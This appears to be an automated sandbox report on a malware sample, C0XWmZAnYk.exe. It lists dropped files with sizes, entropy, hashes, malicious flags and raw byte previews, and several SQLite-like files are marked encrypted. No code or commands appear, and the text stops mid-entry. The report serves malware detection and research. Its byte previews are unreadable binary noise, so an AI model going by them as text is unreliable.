              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):820
              Entropy (8bit):7.779700046639322
              Encrypted:false
              SSDEEP:12:pSxSPmOn0mTzGfsooxFrD/AKnG5NgVUXnARueiGCAtk+DL3WOGmP+PUhQ7R9hyry:pSxSPmI0gDAKK12jrRP3QUO7R9crd+bD
              MD5:617F216F2D6A58D9C6DB600B6EB8368A
              SHA1:211955409487EF1C3A5A56E1D29C95763EEECA80
              SHA-256:889F0523D114CE2BC491DA7CB0AD5EEA55F4D0D235D1F4736E82ADCC369DB4C8
              SHA-512:B05A84C09A992C128766E08D5A9674582C578B780DF312EFD8FB37B46EB2498FFAD9B5064D71BB23057E158DD1FC9A7BA0CBECB4D80B5240249FAA2A23D1AE58
              Malicious:false
              Preview:.<?.1.H...a...Q.......j.B1F...X.xZ.e.4..`.rE%.&.N..N0<s...n........o.x/..0....w..0BY..n:.B..s.rR.a(D.C~....e..\$!58....y.W.........u. Q.8.8..o....m....i$..K.........'.b..._..V?L..x..].......t.^.1..at.!..,.y.:h ...,.#.4.(1.p.\....(...A...me.'.|.Y.D.....UJ^.\....w..........hu.#z.U.!n...YM..]...u....W{u.......S}..7.....%..]sh..wsd.{.. ..F$.Imw>zR......"nI.._G....|G...........S...l..kG......G...P.g....q..........I.E.U.t.p..go=t.ud..."]..........g~.........m.r......5;.?......d.K"........R..r.}...^TKJ.o#KC.ouZ~...O<4_..w.tVi4....O.p:T."1j.=k'..U.C.u..A..+z......).J..O.+.mlE+..C...$.)...9To.n.\y.U].l.(.u.k..N...8SA0....`>.:.}......N.9....?....b.I.Z..k...........?.......j.N}...U../PP.......4...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1098
              Entropy (8bit):7.782674479458351
              Encrypted:false
              SSDEEP:24:9rUrLwBi7wkrVXzAn/v+dz9x1MQvYKEFSXvEL6+dFd+bD:GLwkRjAn/WdJAzpRd/8D
              MD5:401EE17DAC5FD104BFB3655D0F64F892
              SHA1:AAB63D77464EDDA8D39A13F3FCD31BB9774823F2
              SHA-256:AD2DFCFC5FE406AD5278B3A2CEE727D7BC9AF452CBA3E7976634F6FE344BDB0B
              SHA-512:A32FA513FEA4107F84A3E0F4E05F0CAB23FAC376C70AA0FB7BE1814DB1C7F8B09A3C67A5A9870C42F8AE2865777DA3EF49F6CD41F7DFF5045148A1A83C08E60D
              Malicious:false
              Preview:3.7.4...x.o..!d-.......... .h.b.l.b..Ku..>...".......$M..o...Pt./.M.......}0...... (......|.......9.d.....b.5..I.S....|H.p..iy.}..'..*...2;.X...p...Uh.e '.w..D..=px.q...g.........'....G...t.I7P.8.hU....j.....N..q....,.h....(.....2x}=....D9k...q.Io....w....:......%...DT.......M...u.....+._....<..Az-..^?Cw.Y.'..S.O(..k.ko...]..w...A...Q.|k..L..bq.wy..q.+..SF..km.e.@..n..b.+...0...w.B.0....X.$g.:"j.\!BF.@..tP.oY......j..H.....F..X..Q...l..$6D....[.|..@Z.....,...F.U.X/w2d..}m...p.lj{}Y.<...........(VJ..U%...XS,i.LC.f.+....0;.@Y...Y...HL_X..hp.........&.z.....4...V.f..g..).x....%.5y....,:Ew.`.x.8.K......i.`..^.."./.y....S...M....t}.+...u=.D.smCi.{@a(B......m...y....c.".)5....@....$.........{g...a......nl...."E..2...U>.6&._.N.;X3.......A.?D?9u....}..2>.....8...(...e*AwM...y.z..e{)....s.(...z..j>..I.97.K......w.I......wt%.6].%...C."j.M....m.1.u..XI...v%.3.n. .-]p..p.o.^...`..]T.w.%a`.`)..G...+..S.M....3............l....?..9..~.K#...1&..(..).F........7G..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):24910
              Entropy (8bit):7.99345786007002
              Encrypted:true
              SSDEEP:768:ZnS00NZfntaCQ/xJank58Gs71rw91pUgfC2NN:FUltfQvKnD1Gjf/z
              MD5:5106F535F049DC8EF507629F2F931156
              SHA1:8620D5D068874ACB5F817C67C9F8B2FF1EB2522F
              SHA-256:4155BF3E8BEB2A2FD5462886BFBB67C0EB8C559B0BBB6CB0921BC8D3F5F64C17
              SHA-512:BE19B58FA039E9A13BACDA3EBC85AEF874352D032F56E8E41FD30A8CFED5AFC6316FD049A3B6ED2307F6A8A65E303ADFA53A05BBD919E2A53A4986477CE12C2C
              Malicious:true
              Preview:SQLitP.....e...K.q....\..i...D}7...Y..U..g=.....B..v.+.@?C...>t.......S#....."..(.w..o...9..._..DG.b.....b....B.T...).Gf........:.S.......9.!....,.Oysb'..A *...D....'`...`C\.Vc.Y.}.;...}.J....B.%..^.S....$..T...T..Bq.>!.(...d.Z&>@..r.{[......U....8..r.heJ........&&...D...U......'.`..!.v......u..t...Ur.;.OF...... ...V..s.T.....e...3T...U....h......V....[.....+.Q..V.@..k\......T.t.w.i8zD..J@..9W. .".*...<.......9>...ob.#.h...)...8.5.N.]..hW...Pw.o:.=I<.$f`.u...<.*3#....P5....Hq7..k.v./Xn...P..A...w./....[.[a....O#..#....Z5A".j.mv.Ca-...k!...n..nE....f.......5c.....Mw..S.....t...........Z..(*..K.i.."s.I...G..h.Q.4.........qQv..)......>../.y$f0..C.x..piz.<.\....|.:.q.....0k3x.\tRc.1./x...0.b>..........{}^...../+a.........,'....OYGz....w......v.R..mO...L....*...._yV..x...l......0.......o...d..../i.=.LN?I.w.2C.:5 ......wF.^+.......V .h` w..3.6.>E.....(.n..P.....v)..5....m....F..W.......B^....O.V....O......p....x..........:.T*.3\ o....E.c..g2-.g..)
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):24910
              Entropy (8bit):7.9913955898128615
              Encrypted:true
              SSDEEP:384:XiqKn90ICMd7jNYEITX3izKk65IrWPpbkVmtgWPjTEftlPb9cdGxB17:yD31pITX3izKkq5PpgQ6W7Aftlj9CGV7
              MD5:CFD8E0C9CC9B08F2236A4EF4FD6B1945
              SHA1:F9F7B0ACBC8E043834A3056BA6B7C263937BB63C
              SHA-256:3D9C56955D005EBC6A147703DB2B6E822863057B28784F258C4E1547C742ABA6
              SHA-512:F0235E705E896E7AE94E3351CB238E522BA72BE9CFCA40272261F596606ADEACA33D82E766551A25D4EE7C89D351C63836BA6398DDE18AB264243FA940E1C55B
              Malicious:true
              Preview:SQLit..+.z.q...9.H;...I.eD..ms.QQ.H..%n,!.....=.p....N........*>|..`.wr..U..jH#....v...x4..C.T..j. ..1a....... ....cio`.d...q..>.Z....w..m9_^....o.z`......m....Z..88..]6.....;/.q.......`%.J....W..a.....u..V.7/.j.H6.....#.R.[..r.v.......E...j.a.Sx_..iK$....+M.Q...[\`s......ax.{..Y.7.@........I..{..#H..:i.....<bp.....:Y.m.......R..P....+[.m.p..iU|R......&....T.E.f>..6C.%;5..lS.^_..:.......G..!.@.I7......7;....y........AV...y.....yw..'=QM-A..q.C......C...v^.A...k...R@.%...(R.8..x....i.[.xI..P..W.og.Q....^.!.&lt..<....gy.-B.s..........K.._A.D..Z.~_/.}..6._@|.._:.c.1..6g....//.,7....!.[...d7.(....K.......:mWn3....]..SH}.~..Dv...Tb.,6..Jz..8.K/....;......9.Vt....=.eT.3..|..(..........Go:..x...%.1+....9.W.#..^8....7..%#.s...>,.....i..E.L[. $./..V7 5.wF..m.D...V..,8......)ZQ**....S...z...9.mS.=.X..L.kob...*>F...*..0.a.@..<..u...Y.+.......h..PO{7....}.R...N.j....Nxs..H'NhG..{..6.9..+.a3%D_o..C.D.uQ._.F.=._.S.....c....l.55U.s.5.x......S..S=
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):24910
              Entropy (8bit):7.992738935336683
              Encrypted:true
              SSDEEP:384:DpAHUWHyrT/7LHUq64En73bo3pTqQIHRVqANbiyqUuuUT0/gxBb7VwVvtodQzI8z:xWHysFLo5TqHxpN2Muuq0/I7VwVvt5zz
              MD5:E6FDABC71D8F1439F7FF9232FAE4AE2D
              SHA1:F67CFC4A7AA34F3AA01C26A539826DC6330A040D
              SHA-256:B475A2CB577E103A6932D85C79B99FDFE2964F713DE4BED236E6E146E2992B5B
              SHA-512:16D836CD91815909E578510718C16114C4C0385BABA683D804EF708637949F5536682942AA7A7FCEA0CDEE24C40D65762FBE8CCE4E2B2546DD1B18B8290B1655
              Malicious:true
              Preview:SQLiti...........7.ZO2uy..l..I...FY.C...0....W.K.3.~.A.z.......(d.M.).(.._...$.)p.5.-....5.Z.&..hO]....\-..A...8@Q._..wgj..<...M..EJ..........0.....V.E.*..].w.#.xz..!.....*N....ID....m....V.I...q.....C......3Lm..8R,..W..d...y..{}... ...H..../.hN!Ee...}.1.#V.u........lHI..b.a{Q.0.... ...Q.....Zl.,.+...........V.......u@G5h...K.T....'F...)...d(.2.1..&"..u8...3.Q.'gLw.X.n....6@...9tg..R. .?.v.]a5../"....q........N._..3..J..1?..%.|D@.........n..`z....u.TO..|.4.+.c..L8.&o....x....'Om...o}...B=.4?.C(..Y.2.&.....~..B.9....;a.'e}."........Y....!6N...(....'.".F..g...yI.|.V../...&....^..}.9..PX).j..nE.....g-r. ..F.,...M.....f1..^....8.L....(..TJn.'c......~^.Vif.Fq.@..")P.f....l.@...s>.?.p..y4..9.T.V.A..|O...sh.S...(.j.a...F.......W.o].D;.$_..b1;..].. `.#.6..uF..T.`....q.T<a\..N}.;(.=}...K.$&...{.Ae/...,I...l...Q..w"..X+#Q....'........7I..jn...z..h.......h../>4..'\...:.X5}`.........!...6v.....K.R...5.2....aO.....B... ....wn.. ..[...F.R..Y..:
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):24910
              Entropy (8bit):7.99284826368453
              Encrypted:true
              SSDEEP:768:EsUec9D/SZ/taxMOZGUrKFgBH7hdkAFl9Hr:jHc9G/tDOZBKFg97hmAFjHr
              MD5:A559579D2565FE4F79810CDD84DE44D7
              SHA1:7F76428A4BA8B8A82694BA7D5D53B9B93747CDAB
              SHA-256:6D74C23592B7BF9C74878083FBBEA246330716233D864E5A69E1401193EF9AB1
              SHA-512:4022D7174506C5F4FC2D42F773C5EB68FC5E94EF27DD793658FD9D5CC49DC589C4989691CE6D6F045A9DE5602C626D9B29D7B016038AC508C414301D36B65CB8
              Malicious:true
              Preview:SQLit.C0.E....ko....../c.l..u".....1...u...d.....^.....Qs....G-...8.X.:..V9.:.u.......DM!.U...42..>.`.2.i_...#.....w.J+.9........F..`-p.y.i.x.X...I.n..M.+sj.H.1I.....gH..........J....sD...a...@>>.B<)|...2...0.N.z.......,......b1...... --+;..;_....{...z~.iD..p...L.8..hZ......h..ka.[o....J..BhK..<....J...........(.S./u..Z...Z.ly..x.CghK).#Q..}....|>.0)W.3...}..H1.,.<."...y.+.a..%...9I...^Hz..;..#.N......8.?4..(......v..oc3.;.h..V.L..........kE....d.....g...rn.A.LDc.1...C..fl...XUX.X.Dx...5.(OV.Q=..$2...@_!...G....d...(t..Ir..=....t.{)...Pv...Sc?.JYe.i.4z.\.!'..cU...f...|P.7G.o..=..TC.]5..P...P.<...t b1W.(..._w.6...4.J...Nw.e..R..)...i.|....=.W..9..h$.^..#.d..~...<..As>y...A.. .N..:.~u~.;+._9;4.......a.u...!OJ.4z|p2....v.yY.G........9#.]}P5R.K.X,.... .....&...M.Q42...SW.z..k......m..{n..@.UgO.....w..g.&.^..l).....9..?..C.....z-.....F=n0..z.0...,.F..L.-..Z?......H..n..h%.I..qeX._....*..z.j....+U.:..f.To....a..~....3b.d...`........K~Z.g.Zl...<E
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2612
              Entropy (8bit):7.929840124863181
              Encrypted:false
              SSDEEP:48:ACLJeyg+fzteaukpg/ZW51Qtt8n2FXWF0DzQnVhzJ6vZAT8D:ACAygCcatggPZgQvnLEBn
              MD5:2914A4B088AB174713F28B7C1FA32E68
              SHA1:A31241573D23CCC9EC1EBB4903006B654834A115
              SHA-256:A7423E22D92C9E0A68677794274071C8A65250AA76948773F58EE78893955816
              SHA-512:8649DC23BBACED2C663EE2089197F7F0A0BD0C26EF42CCE20736045AB12074C9C026821F33A4136E0360F44F53F8C62D2AD5B7D602BE051F8A3405148CC4F483
              Malicious:false
              Preview:{.".TG...W.j..n..[a....0\..+A..,w.f4.z.. z.M......`....>.Y8.-..^.'?.Q..,.bMI,..:.......t.4.TFU.>.....A1..~...!&*..-..-...).a.M..|-T..F\....b.u.....h.xW=....E.C...E.`..P...ub......?...xJh..n.;.6...6.U&.K5..e..3..L...60FkJB5X.%K......0.G....P=.Q[..'=..0X.C.....L..SK..h..W~..V .z.[..i..c......%...d....5_V...\z.\:......b.a..`1..[...%...D.F.\....e..Mm.d]...l......%.^.6/.t4.WT.,:O......!C'?3$.^:cd[.......m....Be.i-p.().1C$..UJ.%..!.z......UC.t.d. .d.0.x\,.V:7..dJ.fz.Wq..R;.9.#.l...'.......,.r.o.D.\...I.o......C1.t..-#n..&..i...p...P.../YD.....u_T#_...J...W..w.... n<..K)./)C>..$:....g+!.l..._..g.Z\.*=.....d.?..6.._..8.L7.".h.v-.~.."8.._.3R...%..............W8.v.,...s......J9..8q..e..J...M..8.%...k.u1.".T.sC.6E.......;......."v..T......^.......5.*d.......Xl.........*p...V%~.}<. .,R*...x......;.}.}.... Y....qP.....E."..gNo.A.6.....;L.".S.)1a6..@.}..@..U...<B..\....zj+..A.4.L.#....8=}{Q8M^..!p.U9......M...7...X.JL...&...l.cU`..l4.|.a.h.;..w...-]
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2612
              Entropy (8bit):7.924238672620946
              Encrypted:false
              SSDEEP:48:xi3kQkmEArZqSVGrgvMAjnnT1maKckTvlh9vY5pNKB7g6Ixbr+3aVLlASt8D:xi3NkxArragvtnT1maKrTvlhqjiIbK3r
              MD5:1D866FB351999C7995880F9B6088CFC9
              SHA1:74D558BA0CFBC69175E6170A1EEFDFAF6F9E2358
              SHA-256:2B491D731C9DEF187C0F3168E1D896A22B8F37A3F5A8D955FDE33033B20D2BF7
              SHA-512:2D85D8C36E9E2EE1DFD61F92839EB920AD337D303ECD80ED43D32C91CA638E09D075AB8953AECBBB7FD072B49D0462BD4A2DCABA4A2E687559C85CD749FEB403
              Malicious:false
              Preview:{.".T\.....r.G..$D,;..L..t.R..(.zR...uq....px&.+..!f..!.q>.@.g..Vk............c.:2..O.u..u.l5.}..j..j..sW7k....*3......../.sha...e..!.....%C....k....qB.+`....c.*./ 6.......)..k?..m....i]...f......q'2.g.?.C.%.?..7..kU....d.F.H9...H.3..78v.....c..y.....4...r..@.Z.._.1...u...p........1i..`...~.....:...Dm.......y.-.....L .H..WR...*X.#...^^...u\xy.8L..WuD#T..@.]c.x...n...._.dc.YV.....)..cx{.Q..zQ.q9..,..i...K...X.e.2....]*..?.&14I..:4.oX)......5......7....^..;.......> ..<...g7s.3"^e.|OPx......P.7..]1...Za"[..`.8..3S`..b.Q.E\C.<.B..."...Y2T..?.=..c...&.y.=..$. .s.[.w..z._$....W.7.s.6d4.....C.....c..p.V...z.)|......|u7..G..a.t}.B8...e..F9........(=2....c..i.{o...B.rU{....;...A......>.".....K......q.r.|s..F...PS.[...S..0._.R...c.:.....6.i...3...<....uu.1g.k..)..ie;..........8i.PZ|D..1......6A......g.m.....X.T....7N....B.d......].4....-..K....(.uoeYB.3...=.I..h.e.3...x....4.g.C..8.j:W....P+...FG.....N...q..l5..-y.GW.....T.......oC.W]y.d2.^.w.6..+.."Q.#.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3018
              Entropy (8bit):7.936331671959038
              Encrypted:false
              SSDEEP:48:Pjm9hv3PkKrMglGW+QLR60IogCC3gNgOKq6BObZ8k0jMJKEPtz6IyZK9O7bknSNX:rmXvPj/AWlLRDIoBCYkBs8k0wJBPoIyD
              MD5:ABE052A6A62FD10F2058CED5414ADF4D
              SHA1:DFBB19558F1E0BCCAFC42FCE49C708D862D6D9A4
              SHA-256:A88F0698724BF737D21ACDC71474CA543540844E98BACF2B6868E2655110A7FD
              SHA-512:42B0832BB762000556002AC8C18FEFB3B83D63A1E31195F2AC6633649DD3D8C296E2EC558175FABE29EE622B81015401801FC31E88D733DF9800BDAB62CCB919
              Malicious:false
              Preview:{.".Tt..I5E....... Tqm4.1k..|.......mD..y...QZm.I.o..o....?(^.1C3.v.....i.$.-;..{V.....GE...D.,L..[..:.....c.c`9y.;[.8o....SS>y.....e...W*.1`B...GS.......&5.4...f.u....U.y.~....e&"L..(s`....W..\v=.b.\77...F...$z.o....3.S...um=.."..d.p[..!,.......ao.z-;D..p..i}..z9;B.>4....@9!l.9k.M.+e.6....LV].L.q...!0.'.b[.p...7#9.a.........E\~q....w.,...:.[(..6Y...F...y..5....S..Qz.IA.@....0..,r.....Q...DI..Y..s4H ...~....1.H^[......fR..F+2V....h.b<5...(.V.K....0...... ...p|+.6....0S1.=..t..o.-.U.W...p.U.RK.......$.g%l\.".cL......1..c.p..\.....p..l....K....j.....5u...U..q:..3G.<M.w.\v.!.}Jq..#vd.,x...`.(..?.......X..-3..N.s-.o.,...i.&..\R>h...I...0.X.a..t+.+....[.i.O+...E..U.b.t....]*.*..M........6..|l`SE2..dK.>...E...FE.l).6.5..M.%h....S..".......;.....u..!8d.:.F...O..6.5%.t...k.G..9..*`J........_...6....n,.Y.Q..{......v.wK33..-...5O./K.O.X..,u..'*.v..i.m.mb....d.G{-9_......!..k..:O8.D.<.P..:.......).[..$.g.IR..^.["..<..".B...e.pz]..<.Z..FO):+..H.8.....7...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2612
              Entropy (8bit):7.9275858426028005
              Encrypted:false
              SSDEEP:48:6JOwynC5CBSisq++BodUlZ9Lvs4aNqMBB7qpfBxY44NKVHuS3c8D:6Iwyn6Ou+uU39LvjKNlqpVEKVHZx
              MD5:AEAE74C4A47F7E9165F3302E1F1FF5D0
              SHA1:2CE0622249B5D853930737A3B95027963483BE5C
              SHA-256:94DB8B9DF018711CF84FB6BDCE6D0625988E061138C487C772CBEA2260F3F565
              SHA-512:7C1167BD480368D935DA082C8B77921A24DA130B94332ADBFC3AB3802C44F7FEEEA64BB28C09555080859B6FACEDEDCA99A2E548CEB58566B450D618CD99E9DE
              Malicious:false
              Preview:{.".T(.X...S.]>+&+....#..2..$..|...>.!....b:..........3..]..TI?.T.9..j..T..zH.....5..2z......g.Z.,.q.aIjb........O.6.F...3...TR.J|n..[..W~..z+#.k.........%.\k...I.3@.?b...UC...!.....I."y.x.Y..`.......O.....<m.s.......{.{..i.=$....WF.0U.c...z...*o.U.(w%M.%..s..Y.@\.......w.z....DZd.n..UG..c.<..h.....`...Wd.=......v....\..O..pK.....I.u.#.........j._U0.............a:.v..wD..>9......S$F,k....^.y.c...g.........>...J.X..{...A..L1.Z...qc..P.1.%...L.......U..gD...6$.Ms.........Q.z*..v..4....=.0=.+.,.....W.{.k%odx.......J..w>.W......B...b.{#^..{.d...2..V........Z9..D...sBX~.^.^.\...(}Q..D.3.......{[.f(.i.u.$.2QE@fk!a_..Eu.?.....fkt..}/...o...r..~.2U...TP.4.Q>....*.V.z...6...Y_vK.4.....L.F..i.....e....B_../.,R.^7n....+}.R.1d.J...FR.Xt..6....^....?.h..../?...7....H.........v=H.{.U........Nd...i..".(....p[..V.6.tE............3...h..=..q..F....".S3K.:..w...C.....r...{..!...Hg.<.a/7..p...B.S.M.......e.]fJl..K..T.OFc...%.\$!..((.[..<.j.y....]...l..o~.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):4956
              Entropy (8bit):7.9640263178013955
              Encrypted:false
              SSDEEP:96:r7FTI6VTD33MT9l+0+59Vy0HZSHnxR/p3quSVb3qJh64S:rJrXs+555u3h++J5S
              MD5:3C6B1DFA97B26D990A1C469B9642DB99
              SHA1:F609D9419F5BAB8C2807DDDA57CF2D3A8D561B6B
              SHA-256:175A1E57CEBDDFFF3C0C0E16C36E2E6F07ACA72CECB8B61DCD6070C2DAF91AFB
              SHA-512:9AFA9346D1AE47321245B9BBC5B61389C1F5D0FD33120E98B46AB408A2AEE32413BF535A800B83D0DF7A36A79085BFAA4DE78A2D7FFDB9FB05BBD8DE7D2DFB22
              Malicious:false
              Preview:{.".T.h...........e~?..}4.....G.s...-.I...Sb,..*......fg..E..+*... h..sh....;bV.S.8.G......<..P.@...{1...E...........\U.n.8...%..&U..'H.,....He.[&~.L...e...._.T..87..q...".F/.....C.o...U2.0...5...S.#.q...J..t_.(./.|M.A.y.9&wnf.q}............B}.o.t....LDyx{)....0re..*.A.6mw&..q...26_.AB.<>/..M|.o<..sk..l.k..%..T./fGk.......@...+7.[.K.......z..>-.C..@N/.p.C?5y...ws.,Hv./.k.cY..).n.^8yU7j..O...`P...'.tCc...-..V.<.....A.(......SN,....m+(v6.....0.j..Pb_C#.sB.j....V.!.......x..p...,y_..Wp...E.C...8m_....@E4.K5H......}f.-....zI.I.$Ev.6......1...H[.b.s.z.....f.@6-..9..f..t-.........7.F.....v.......j.x.-...~..:......L.j.:....a"v.{..%=...&....R=.nN,d;.0e.....^.uM....~vv........=...Q_.:.!._..............x.b.....v.X...R;..4N......n.r..........fN.v....iY...|B.^v\....."Q..o.!..D.......T..^.2x.U....Bo....]..6.v.qg......3.......m.f..!.s.Nq?...o.6.;.Y&..z.....b..[w........Sz..)...O.._.xgy.w..E.\.....4..R....;$..E..9c.v....(.. .xb..%.q....I........Xk
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3018
              Entropy (8bit):7.933774791206207
              Encrypted:false
              SSDEEP:48:h8ExZdBictLK6IdFTsYm/iRxjmXfwJAguMZYb1SsHV2i98kCRvVWYQDk8D:h8EjScE6IdF4vQxjFOeZk8g9B2vE5
              MD5:B3B3A1C12A3E10A70FFDDACEBDA10AC5
              SHA1:F7AA95B3B97A6701F538C6C042645657DD4E9F48
              SHA-256:E88E663C893A7C0A73494D41F1B445D52923643E87204AAF3B85878FD0278159
              SHA-512:E59F93EAAB77FDE3E37C3259DABF7D6C8FF8E5966143691811B2CD752E76BAD6026EDE2691CC7B1DFDA0F53F51F8A934313E428C0FD48303A40CEA94235189CA
              Malicious:false
              Preview:{.".T.a.n.......GL.j.....G.....|...\..c.d.#.X.t.N7S.....0.EX...Ln..i.......%..g.....r..m.'..7..;...H.U.l>.(.4.<..@..%.DX....&&......n.yN..u...=....d.bA....D.~J.....).5..N...{3.;.Fh....M2&y..{..........j..y.O....0.......R.........7tj.[...2kP..|).Z.eK9y.w...].c.mgB.....>...MR>K.t-D.B.U.2..............1.<.-..S.u..G.-.....%W.H\....!f....-.M.&.r.F......0..0#.ZY'...c...s.>'..-.-.^.H...a.x....I..3....kFv..v.._.....FpL2JR.5.h..#m.$..n..3h.P.&...K.......W.0F.l[.v.4c......>..R.V6W...ie8.(@.(.......gW).n..)...P9#.?+3Qu~oB..$.F...o.F....X....>..C.Z1.....s...7.*S.n...[RW...|.x0n..z..S.,I.%[.t..@.y1.m....J.O}...f.....o..>.....^....)+.....\.......^../p@.2......%..J............U........k...U...........{..T2.%........`....KP...3&..r...........^...U..5@.........../+..X.F..7..>..Z.)e.}.?..1[L....0...^Xy.M.z...J.....-..9D...:.^.....Pv..AW.n....M.fl.....].xN.1c..H.g.L............Y.0..zj.[....R..D.......P),E.....,.....7..g....Z...=.$yB
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2612
              Entropy (8bit):7.917500987773225
              Encrypted:false
              SSDEEP:48:CjPwY8Fo1/nd79s2Sx8gRNeL6pXcIijhQFv81OF1OScFlrYQ2/HKzdhNn68D:CkP6xxy8gSeQjKOScF6VorNnb
              MD5:5E6503A42DF8F6B49B0CFBA7034934FA
              SHA1:49C9441C52D3185BD2BF9958237F1C61BCFFEA46
              SHA-256:E0CE5C9D2E53A6C28820EC07AE5DEDCE9FBF95563C031824B706D4B9244F477C
              SHA-512:C50B359838F94BDFD9F10AD90080135989B9144735DC0A6943429EBC6E97A6371AF523EB322E56C5DF3DDEF7B8BC983639A3EC281E176084749E8B67E5AF8BEF
              Malicious:false
              Preview:{.".TN+J....$..,.Q...F|E._a...h..DS.j...s.XKq?..2.;.%.#.&0....h.V.8.. G....D..K..&.4<.>..az....=[..J{..a....$._.i....L...ji#.)%..e1..v3^.....B]va.....v...s.., .8f.UJ.mS.....#.T=..f..YS*.....{..<,...[...UOE.i..t....u.a......nUZ.%...P..4{;%.:......c3......B;....&.).eoz...D:..|...x...-."...J.s..\....z}E..o.B...C...Y.\.e.=..5..?e..~'..B..\\......v..X....!.e.!.k.].|5...C..u.V.2h.\..*H...........fV...0..3......Uj..].......ta.a.A:{(..8.{^..I..C.[ZV./.f...bQ.....!/.f\..I'^! <...V..G.u......C.........w$...+..:..-&.jzT?p.....D...%..p.....e...!.x..P/......Z.X.~....9\c.c].....B01.ns..s........H..V.?.o...(.C.x.d..*..y.....I6O[c.]...}..T...s.V_..O.....dk........K..8M*...^4+.YG..p..`.y.B..U.u\G$.....,...S.dV...lt.1.,....t.Hj.0TN.8...U.....&./..D......L....3..h...H...m."....j Ie..+oD...Y].0."4.Y...W:..#o...i!._..."..3..fQ...e.K.f..!8..$..M....P..W.=.sY...,.^.b3.&....J.K...[ ..5@....N.....7...s.*}...N....Zy........t.w.V.k.I@g......L.1.;PuG.M....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):770
              Entropy (8bit):7.715488788482206
              Encrypted:false
              SSDEEP:24:xmn/7x0PLnSCclY+WmvV8IVxu9NfX5qnARoxwIwpad+bD:w/7mPLnv7VQxubxqnARon8D
              MD5:ED1C878BB33046CF079423990A9A37A8
              SHA1:11966FCACE4DF4B653D3A2FC937D17457ABD0DD1
              SHA-256:305E5AEB07014BD8051DF146BB8EDB80F07593FCE202703944E06377C4B3CD71
              SHA-512:881576128227CC3FE334C6FB4BE1F140495F71969A00AD13A19062FE469A8D78DAF49F1E1D8CBD6A2840AD9C5360AD929DA2CA058EFA575BFDD5ED51B4156A79
              Malicious:false
              Preview:....B..$.........o..=.!.....s....>,.1.'n..4.=8PqP...."O..V...k...%.-.5'.d...^.c%. .._.s...:..........i....mnO..,. ......p.|....&.>L...p,RrD..&41..3h9..eq...O....MT.pU...."..{3.\.]..."V..$.^6ys....hd.....n)"....Dlg]i.h..x.."...<.d6...4...Z.>..lk..P..;......9...\...0E.... R....<}r.Y".*.K...;.7]N........EY;Q..vUF....*.\#..........!.....y..3*.......@.1ZJ|..cx.~.6......Rj..o.........X.$w...| ....M\.VY...& ...1W.........9.O.2/v.....L.Alw...M...1es.Bv.&Q.}.........|..(.m......m.'P.`r.2|..BlLc.$.R...e.....#.....%:.$.....HE"..L.9P........y..M.[..#....:q.VR...Om.!}.%.K......w...G....NB...M....T.{.\+...<~u7B..R\-....3;rC`..B..c.;.Y.Q+e!....sA7..K.`hgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):424152
              Entropy (8bit):6.332247626732723
              Encrypted:false
              SSDEEP:6144:5pAWmsmToa3SnhIcfZwA4BcPx+N7SpWm+vyJfbnQkK96B88yKv4bWTmTvEiLSV:sahlhIcxwA4BcPMx6Wm+6dF4/6
              MD5:788356A00D27A8443E88DDDD8B917094
              SHA1:80B93385372F1F8605E848BCDF93112680D72231
              SHA-256:3A5E33661548A38270A5C6013EC2CF2F791F15C1C874A67422AD690544DE462D
              SHA-512:F04B7E4BB2144EDD849CF37EA031F12924FD7420153016D89F3068CFC821D8F7616494F084AABD38D6D07E833B25031AD38C08F3ADA599E53BCA92CB71A499E3
              Malicious:false
              Preview:...P..oz......x..3.5xDn$...u*I....|hl7..$(.m.K).V..Y.5......O.8..}Z.d:..N.......\.{s.j....(.o. .......2.C.ghEr.\.%...x...*...0...........;..q....q..R=s..J...g...jKVM...H....KU...W0K"@=H...*._.9..Z....Pc....)..^G....._.5n..^...e..]~......?..X1..U.H......e...-.L.A.pU(.N/;h..H..m.Z.&.t.v'.97ug..niZ.......U{.....tc..a..f..:was.nF..M/....Z..0..;..H%..-..s\ 8.D....D.fu$R...y..DF.6G..r1.Y43l.p>.b..f...Ok.T....7.y5B1.#. ]..^...x..x..X..i?......SG.*.!D......~....W....I@.....E<.x..J.2..*r.;)..../.O..fW.=..#|..l.lt...(,.p.....t.(Z.K"..f...Q.........:...z.T....:.....2.Ik]..J..Ce/.g.......V..1.t,.C..-.k+..d....oZ...0.8.............Tl<..N.~..l..7C..'.|...ns..H/...hq..j.~g....M.H.....o....?.[...";.j.S.u.U..tT.)..n.Z..R.j....k....z..Un..U...I..u.L.'..K...[,....`.y..!.$%^...h..&@KVH..1.+....;yO?.].l..@@8.#.rES.2..5.....%6p..;Q.....cp.......p..+...}rR)PN.T....1'.m"p/:..Z..4....[?b...OQ....%.z@..o..,.\..1...h...?......w..I~...A..G.O......7..m...~`W.../L
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):16718
